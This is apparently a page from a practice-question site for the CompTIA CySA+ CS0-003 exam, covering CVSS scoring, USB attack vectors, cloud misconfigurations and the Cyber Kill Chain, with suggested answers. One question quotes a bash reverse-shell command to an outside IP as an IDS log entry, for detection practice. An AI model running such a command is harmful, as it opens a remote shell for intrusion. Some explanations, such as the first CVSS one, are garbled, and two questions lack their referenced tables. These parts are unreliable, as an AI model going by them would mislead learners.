ExamGecko
CompTIA CS0-003 Practice Test - Questions Answers, Page 20

A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:

Which of the following vulnerabilities should be prioritized for remediation?

A.
1
B.
2
C.
3
D.
4
Suggested answer: B

Explanation:

Vulnerability 2 has the highest impact metrics, specifically the highest attack vector (AV) and attack complexity (AC) values. This means that the vulnerability is more likely to be exploited and more difficult to remediate.

CVSS v3.1 Specification Document, sections 2.1.1 and 2.1.2

The CVSS v3 Vulnerability Scoring System, sections 3.1 and 3.2

A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

A.
Conduct security awareness training on the risks of using unknown and unencrypted USBs.
B.
Write a removable media policy that explains that USBs cannot be connected to a company asset.
C.
Check configurations to determine whether USB ports are enabled on company assets.
D.
Review logs to see whether this exploitable vulnerability has already impacted the company.
Suggested answer: C

Explanation:

USB ports are a common attack vector that can be used to deliver malware, steal data, or compromise systems. The first step to mitigate this vulnerability is to check the configurations of the company assets and disable or restrict the USB ports if possible. This will prevent unauthorized devices from being connected and reduce the attack surface. The other options are also important, but they are not the first priority in this scenario.

CompTIA CySA+ CS0-003 Certification Study Guide, page 247

What are Attack Vectors: Definition & Vulnerabilities, section "How to secure attack vectors"

Are there any attack vectors for a printer connected through USB in a Windows environment?, answer by user "schroeder"

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

A.
Deploy agents on all systems to perform the scans.
B.
Deploy a central scanner and perform non-credentialed scans.
C.
Deploy a cloud-based scanner and perform a network scan.
D.
Deploy a scanner sensor on every segment and perform credentialed scans.
Suggested answer: A

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A.
#!/bin/bash
nc 10.1.2.3 8080 -vv >/dev/null && echo 'Malicious activity' || echo 'OK'
B.
#!/bin/bash
ps -fea | grep 8080 >/dev/null && echo 'Malicious activity' || echo 'OK'
C.
#!/bin/bash
ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo 'Malicious activity' || echo 'OK'
D.
#!/bin/bash
netstat -antp | grep 8080 >/dev/null && echo 'Malicious activity' || echo 'OK'
Suggested answer: D

Explanation:

The suspicious entry on the host-based IDS logs indicates that a reverse shell was executed on the host, which connects to the remote IP address 10.1.2.3 on port 8080. The shell script option D uses the netstat command to check if there is any active connection to that IP address and port, and prints "Malicious activity" if there is, or "OK" otherwise. This is the most accurate way to confirm if the reverse shell is still active, as the other options may not detect the connection or may produce false positives.

Reference CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 8: Incident Response, page 339. Reverse Shell Cheat Sheet, Bash section.

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

A.
Hacktivist threat
B.
Advanced persistent threat
C.
Unintentional insider threat
D.
Nation-state threat
Suggested answer: C

Explanation:

An unintentional insider threat is a type of network security threat that occurs when a legitimate user of the network unknowingly exposes the network to malicious activity, such as opening a phishing email or a malware-infected attachment from an unknown source. This can compromise the network security and allow attackers to access sensitive data or systems. The other options are not related to the threat concept of ensuring that all network users only open attachments from known sources.

Reference CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 1: Threat and Vulnerability Management, page 13. What is Network Security | Threats, Best Practices | Imperva, Network Security Threats and Attacks, Phishing section. Five Ways to Defend Against Network Security Threats, 2. Use Firewalls section.

A company has the following security requirements:

* No public IPs

* All data secured at rest

* No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

A.
VM_PRD_DB
B.
VM_DEV_DB
C.
VM_DEV_Web02
D.
VM_PRD_Web01
Suggested answer: D

Explanation:

This VM has a public IP and an open port 80, which violates the company's security requirements of no public IPs and no insecure ports/protocols. It also exposes the VM to potential attacks from the internet. This VM should be updated first to use a private IP and close the port 80, or use a secure protocol such as HTTPS.

Reference CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 2: Cloud and Hybrid Environments, page 67. What is a Public IP Address? What is Port 80?

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

A.
AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
B.
AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:L - Base Score 7.2
C.
AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
D.
AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5
Suggested answer: A

Explanation:

This option represents the least impactful risk because it has the lowest base score among the four options, and it also requires high privileges, user interaction, and high attack complexity to exploit, which reduces the likelihood of a successful attack.

Which of the following should be updated after a lessons-learned review?

A.
Disaster recovery plan
B.
Business continuity plan
C.
Tabletop exercise
D.
Incident response plan
Suggested answer: D

Explanation:

A lessons-learned review is a process of evaluating the effectiveness and efficiency of the incident response plan after an incident or an exercise. The purpose of the review is to identify the strengths and weaknesses of the incident response plan, and to update it accordingly to improve the future performance and resilience of the organization. Therefore, the incident response plan should be updated after a lessons-learned review.

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

A.
Insider threat
B.
Ransomware group
C.
Nation-state
D.
Organized crime
Suggested answer: C

A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit?

A.
Reconnaissance
B.
Weaponization
C.
Exploitation
D.
Installation
Suggested answer: B

Explanation:

Weaponization is the stage of the Cyber Kill Chain where the attacker creates or modifies a malicious payload to use against a target. In this case, the disgruntled open-source developer has created a logic bomb that will act as a wiper, which is a type of malware that destroys data on a system. This is an example of weaponization, as the developer has prepared a cyberweapon to sabotage the code repository.

Cyber Kill Chain | Lockheed Martin, which states: "In the weaponization step, the adversary creates remote access malware weapon, such as a virus or worm, tailored to one or more vulnerabilities."

The Cyber Kill Chain: The Seven Steps of a Cyberattack - EC-Council, which states: "In the weaponization stage, all of the attacker's preparatory work culminates in the creation of malware to be used against an identified target."

What is the Cyber Kill Chain? Introduction Guide - CrowdStrike, which states: "Weaponization: The attacker creates a malicious payload that will be delivered to the target."

Total 368 questions